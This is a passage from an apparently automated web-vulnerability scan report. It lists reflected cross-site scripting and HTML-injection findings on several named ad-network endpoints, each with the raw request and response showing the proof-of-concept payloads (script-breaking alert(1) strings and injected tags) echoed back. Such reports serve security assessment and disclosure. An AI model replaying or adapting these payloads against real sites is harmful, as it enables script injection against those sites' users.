Date: Sun, 04 Sep 2011 01:04:51 GMT
Content-Length: 968
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=263;var zzPat='33515";alert(1)//6ad1a189d09,54f5b';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=33515";alert(1)//6ad1a189d09,54f5b;z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311';

var zzhasAd=undefined;
var zzpixie = new Image();
var zzRandom = Math.random();
var zzDate = new Date();
var zz
...[SNIP]...

5.32. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-504/c5/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9627f'%3balert(1)//e9576e37d36 was submitted in the q parameter. This input was echoed as 9627f';alert(1)//e9576e37d36 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-504/c5/jsc/fmr.js?c=825/403/1&a=0&f=&n=305&r=13&d=15&q=9627f'%3balert(1)//e9576e37d36&$=&s=263&z=0.7735994893591851 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:54f5b;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,825,15:305,825,0:0,825,15:305,0,15:0,0,0;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=28:9:9:1:1;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "cff199-8747-4aa4e7838c500"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=192
Expires: Sun, 04 Sep 2011 01:08:03 GMT
Date: Sun, 04 Sep 2011 01:04:51 GMT
Content-Length: 968
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=263;var zzPat='9627f';alert(1)//e9576e37d36,54f5b';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=9627f';alert(1)//e9576e37d36,54f5b;z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311';

...[SNIP]...

5.33. http://cm.npc-mcclatchy.overture.com/js_1_0/ [css_url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cm.npc-mcclatchy.overture.com
Path:	/js_1_0/

Issue detail

The value of the css_url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17667"><script>alert(1)</script>0f9450ed1bb was submitted in the css_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js_1_0/?config=1001507650&type=lifestyle&ctxtId=lifestyle&keywordCharEnc=utf8&source=npc_mcclatchy_sacramentobee_t1_ctxt&adwd=728&adht=90&ctxtUrl=http%3A%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html&ctxtCat=lifestyle&outputCharEnc=latin1&css_url=http://static.mcclatchyinteractive.com/static/styles/mi/third_party/yahoo/yahoo.css17667"><script>alert(1)</script>0f9450ed1bb&tg=1&refUrl=http%3A%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html&du=1&cb=1315097138735&ctxtContent=%3Chead%3E%0A%20%0A%0A%0A%0A%0A%0A%0A%0A%3Cscript%20async%3D%22%22%20src%3D%22http%3A%2F%2Fb.scorecardresearch.com%2Fbeacon.js%22%3E%3C%2Fscript%3E%3Cscript%20async%3D%22%22%20src%3D%22http%3A%2F%2Fb.scorecardresearch.com%2Fbeacon.js%22%3E%3C%2Fscript%3E%3Cscript%20language%3D%22JavaScript%22%3E%0A%3C!--%20%0Avar%20gomez%3D%7B%20%0A%09gs%3A%20new%20Date().getTime()%2C%20%0A%09acctId%3A'D3FD89'%2C%20%0A%09pgId%3A'story-detail'%2C%20%0A%09grpId%3A'Sacbee'%20%0A%7D%3B%0A%0A%0A%2F*Gomez%20tag%20version%3A%207.0*%2Fvar%20gomez%3Dgomez%3Fgomez%3A%7B%7D%3Bgomez.h3%3Dfunction(d%2C%20s)%7Bfor(var%20p%20in%20s)%7Bd%5Bp%5D%3Ds%5Bp%5D%3B%7Dreturn%20d%3B%7D%3Bgomez.h3(gomez%2C%7Bb3%3Afunction(r)%7Bif(r%3C%3D0)return%20false%3Breturn%20Math.random()%3C%3Dr%26%26r%3B%7D%2Cb0 HTTP/1.1
Host: cm.npc-mcclatchy.overture.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=228g5ih765ieg&b=3&s=bh

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:20:59 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDYyMDI2MzNyMASzlMmww=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Wed, 01-Sep-2021 01:20:59 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 4622

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<base target="_blank">
<meta http-equiv="Content-Type" content="text/html; charse
...[SNIP]...
<link rel="stylesheet" href="http://static.mcclatchyinteractive.com/static/styles/mi/third_party/yahoo/yahoo.css17667"><script>alert(1)</script>0f9450ed1bb" type="text/css">
...[SNIP]...

5.34. http://control.adap.tv/control [as parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://control.adap.tv
Path:	/control

Issue detail

The value of the as request parameter is copied into the HTML document as plain text between tags. The payload 6d469<a>6b210401782 was submitted in the as parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /control?context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports&width=300&isTop=true&height=225&as=36d469<a>6b210401782&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=true&eov=cuv775 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Connection: Keep-Alive
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+18%3A09%3A23";Path=/;Domain=.adap.tv;Expires=Tue, 03-Sep-13 01:09:23 GMT
Content-Type: text/xml; charset=iso-8859-1
Content-Length: 32692

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports&width=300&isTop=true&height=225&as=36d469<a>6b210401782&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=true&eov=cuv775]]>
...[SNIP]...

5.35. http://control.adap.tv/control [categories parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://control.adap.tv
Path:	/control

Issue detail

The value of the categories request parameter is copied into the HTML document as plain text between tags. The payload 597f8<a>730fc69c430 was submitted in the categories parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /control?context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports597f8<a>730fc69c430&width=300&isTop=true&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=true&eov=cuv775 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Connection: Keep-Alive
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+18%3A08%3A28";Path=/;Domain=.adap.tv;Expires=Tue, 03-Sep-13 01:08:28 GMT
Content-Type: text/xml; charset=iso-8859-1
Content-Length: 33178

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports597f8<a>730fc69c430&width=300&isTop=true&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=2
...[SNIP]...

5.36. http://control.adap.tv/control [context parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://control.adap.tv
Path:	/control

Issue detail

The value of the context request parameter is copied into the HTML document as plain text between tags. The payload f7644<a>8e21016e644 was submitted in the context parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /control?context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1f7644<a>8e21016e644&categories=sports&width=300&isTop=true&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=true&eov=cuv775 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Connection: Keep-Alive
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+18%3A08%3A16";Path=/;Domain=.adap.tv;Expires=Tue, 03-Sep-13 01:08:16 GMT
Content-Type: text/xml; charset=iso-8859-1
Content-Length: 33245

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1f7644<a>8e21016e644&categories=sports&width=300&isTop=true&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneri
...[SNIP]...

5.37. http://control.adap.tv/control [eov parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://control.adap.tv
Path:	/control

Issue detail

The value of the eov request parameter is copied into the HTML document as plain text between tags. The payload 9ebae<a>8b7b7f1e2c8 was submitted in the eov parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /control?context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports&width=300&isTop=true&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=true&eov=cuv7759ebae<a>8b7b7f1e2c8 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Connection: Keep-Alive
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+18%3A10%3A53";Path=/;Domain=.adap.tv;Expires=Tue, 03-Sep-13 01:10:53 GMT
Content-Type: text/xml; charset=iso-8859-1
Content-Length: 32405

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2Cplayer
...[SNIP]...
as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=true&eov=cuv7759ebae<a>8b7b7f1e2c8]]>
...[SNIP]...

5.38. http://control.adap.tv/control [height parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://control.adap.tv
Path:	/control

Issue detail

The value of the height request parameter is copied into the HTML document as plain text between tags. The payload 885f8<a>99d83319bdd was submitted in the height parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /control?context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports&width=300&isTop=true&height=225885f8<a>99d83319bdd&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=true&eov=cuv775 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Connection: Keep-Alive
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+18%3A09%3A11";Path=/;Domain=.adap.tv;Expires=Tue, 03-Sep-13 01:09:11 GMT
Content-Type: text/xml; charset=iso-8859-1
Content-Length: 33243

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports&width=300&isTop=true&height=225885f8<a>99d83319bdd&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=true&eov=cuv77
...[SNIP]...

5.39. http://control.adap.tv/control [htmlEnabled parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://control.adap.tv
Path:	/control

Issue detail

The value of the htmlEnabled request parameter is copied into the HTML document as plain text between tags. The payload ac2c6<a>db6131604d1 was submitted in the htmlEnabled parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /control?context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports&width=300&isTop=true&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=trueac2c6<a>db6131604d1&eov=cuv775 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Connection: Keep-Alive
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+18%3A10%3A40";Path=/;Domain=.adap.tv;Expires=Tue, 03-Sep-13 01:10:40 GMT
Content-Type: text/xml; charset=iso-8859-1
Content-Length: 32448

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2Cplayer
...[SNIP]...
height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=trueac2c6<a>db6131604d1&eov=cuv775]]>
...[SNIP]...

5.40. http://control.adap.tv/control [isTop parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://control.adap.tv
Path:	/control

Issue detail

The value of the isTop request parameter is copied into the HTML document as plain text between tags. The payload cd78a<a>0be71434d95 was submitted in the isTop parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /control?context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports&width=300&isTop=truecd78a<a>0be71434d95&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=true&eov=cuv775 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Connection: Keep-Alive
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+18%3A09%3A00";Path=/;Domain=.adap.tv;Expires=Tue, 03-Sep-13 01:09:00 GMT
Content-Type: text/xml; charset=iso-8859-1
Content-Length: 32466

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports&width=300&isTop=truecd78a<a>0be71434d95&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=tru
...[SNIP]...

5.41. http://control.adap.tv/control [keywords parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://control.adap.tv
Path:	/control

Issue detail

The value of the keywords request parameter is copied into the HTML document as plain text between tags. The payload fa8ef<a>1955b0f7885 was submitted in the keywords parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /control?context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports&width=300&isTop=true&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascarfa8ef<a>1955b0f7885&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=true&eov=cuv775 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Connection: Keep-Alive
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+18%3A09%3A48";Path=/;Domain=.adap.tv;Expires=Tue, 03-Sep-13 01:09:48 GMT
Content-Type: text/xml; charset=iso-8859-1
Content-Length: 32428

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports&width=300&isTop=true&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascarfa8ef<a>1955b0f7885&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=true&eov=cuv775]]>
...[SNIP]...

5.42. http://control.adap.tv/control [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://control.adap.tv
Path:	/control

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bd66c<a>6facc3e4125 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

